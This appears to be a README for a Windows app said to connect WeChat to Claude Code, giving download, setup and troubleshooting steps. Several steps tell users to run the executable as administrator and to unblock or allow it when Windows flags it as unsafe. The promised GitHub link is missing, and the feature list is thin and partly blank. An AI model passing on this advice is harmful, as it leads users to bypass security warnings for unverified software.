wechat-claude-code lets you chat with Claude Code from WeChat. It gives you a simple way to send messages from WeChat and get replies in the same place. It is built for Windows users who want a quick way to use Claude Code without switching tools all the time.
Use a Windows PC with a stable internet connection. For best results, make sure you have:
- Windows 10 or later
- A working WeChat account
- Enough free disk space for the app and its files
- Permission to run downloaded apps on your PC
If your PC blocks downloaded files, you may need to allow the app in Windows security settings.

- Download the latest release or the main app package from the GitHub page
- Save the file to a folder you can find again, such as Downloads or Desktop
- If the file is a ZIP package, extract it first
- If the file is an EXE file, you can run it after download
- Open WeChat and make sure you are signed in
- Start the app and follow the on-screen steps
If you downloaded a ZIP file:
- Right-click the ZIP file
- Select Extract All
- Choose a folder
- Open the extracted folder
- Find the main app file
- Double-click it to start the app
If you downloaded an EXE file:
- Double-click the EXE file
- If Windows asks for permission, select Yes
- Wait for the app to open
- Follow the setup prompts on screen
If Windows shows a warning, check that you downloaded the file from the GitHub page above before you allow it to run.
- Open WeChat
- Start the wechat-claude-code app on your PC
- Sign in if the app asks you to
- Send a message to the bot or linked chat
- Wait for Claude Code to reply
- Keep your messages short at first so you can test that everything works

This app helps you use Claude Code through WeChat for common chat tasks. You can use it to:
- Ask for text help

- Keep all chat work inside WeChat
If the app does not start, try these steps:
- Make sure you extracted the ZIP file first
- Try running the app as an administrator
- Check that WeChat is open and signed in
- Restart the app and try again
- Make sure your internet connection works
If the app opens but does not reply:
- Confirm that the correct chat is open
- Send a simple test message
- Close and reopen WeChat
- Check whether the app needs a fresh sign-in
Use the app only on a trusted PC. Keep your WeChat account private and avoid sharing login details with others. If you use a shared computer, sign out when you are done.
After setup, you may see:
- An EXE file for launching the app
- A ZIP file with the app package
- A config file with app settings
- A log file for checking errors
Do not rename files unless you need to match a step in the setup guide.
If Windows says the file is unsafe, check that you got it from the GitHub link above. Then right-click the file, open Properties, and look for an Unblock option if it appears.
